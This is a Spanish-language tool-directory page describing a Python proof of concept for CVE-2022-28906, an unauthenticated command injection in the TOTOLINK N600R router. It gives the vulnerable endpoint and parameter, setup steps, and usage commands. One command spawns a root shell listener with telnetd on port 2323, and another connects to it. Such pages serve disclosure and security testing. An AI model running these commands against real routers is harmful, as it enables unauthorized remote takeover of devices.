Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-28906-POC — Prueba de concepto en Python para la inyección de comandos del sistema operativo sin autenticación en TOTOLINK N600R, que explota el parámetro langType para ejecutar comandos arbitrarios en el dispositivo. | Kitploit
Herramientas/GitHubGitHub/finnvle/cve-2022-28906-poc
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlSeguridad de Hardware e IoT
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

Prueba de concepto en Python para la inyección de comandos del sistema operativo sin autenticación en TOTOLINK N600R, que explota el parámetro langType para ejecutar comandos arbitrarios en el dispositivo.

Ver Repositorio
1hace 2 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de CVE-2022-28906

Prueba de concepto en Python para la inyección de comandos sin autenticación en el TOTOLINK N600R.

Python CVSS

Vulnerabilidad

ProductoTOTOLINK N600R
FirmwareV5.3c.7159_B20190425
TipoInyección de comandos del sistema operativo (CWE-78)
ParámetrolangType
Endpoint/cgi-bin/cstecgi.cgi
CVSS v3.19.8 Crítico

Se descubrió que TOTOLink N600R V5.3c.7159_B20190425 contiene una vulnerabilidad de inyección de comandos a través del parámetro langtype en /setting/setLanguageCfg.

Configuración

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Uso

root@kitploit:~
# Uso: python3 poc.py <OBJETIVO> <COMANDO>
# Ejemplo: python3 poc.py 192.168.68.1 "reboot"
# Ejemplo: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <OBJETIVO> <COMANDO>

Ejemplo de prueba de concepto

Usando el PoC para ejecutar remotamente en el objetivo la habilitación de /bin/sh en el puerto 2323

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Respuesta exitosa del PoC

Ver el resultado si el puerto 2323 fue habilitado

Nmap mostrando el puerto 2323 abierto

Conectar al objetivo usando telnet a través del puerto 2323

root@kitploit:~
telnet 192.168.68.1 2323

Validación de shell root

Referencias

  • NVD — CVE-2022-28906
  • Registro CVE — CVE-2022-28906
  • CWE-78 — Inyección de comandos del sistema operativo

Aviso legal

Se proporciona tal cual, sin garantía. El autor no es responsable del mal uso o daños.

Descargar herramienta